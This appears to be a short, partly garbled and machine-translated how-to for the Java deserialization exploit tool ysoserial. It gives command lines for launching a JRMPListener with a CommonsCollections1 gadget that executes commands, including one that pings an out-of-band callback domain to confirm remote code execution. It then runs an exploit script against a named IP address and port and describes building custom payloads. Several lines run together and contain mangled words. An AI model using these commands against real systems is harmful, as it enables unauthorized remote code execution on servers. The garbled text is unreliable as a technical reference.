Introduction to the use of deserialization tool ysoserial
Introduction to the use of the deserialization tool ysoserial what is 0x00 ysoserial?
Ysoserial collects various java to deserialize payload
Download address: https://github.com/angelwhu/ysoserial
Basic usage of 0x01
Execute on the public network vps:
Java-cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [port] CommonsCollections1'[commands]'
Port: the port number of the listener on the public network vps
Commands: commands to be executed
Example:
Java-cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'ping-c 2 rce.267hqw.ceye.io'
Restart a shell window:
Python exploit.py [target ip] [target port] ysoserial-0.0.6-SNAPSHOT-BETA-all.jar [JRMPListener ip] [JRMPListener port] JRMPClient
Liezi:
Python exploit.py 118.89.53.139 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 118.89.53.139 1099 JRMPClient0x02 write your own payloadgit clone https://github.com/fanyingjie2/ysoserial.git in ysoserial put your own payload in the downloaded package: path ysoserial/src/main/java/ysoserial/payloads/ modify Dockerfile
Docker build-t ysoserial .docker run-ti ID number / bin/bash execute apt-get update in docke execute apt-get install lrzszsz target/ysoserial.jar in docker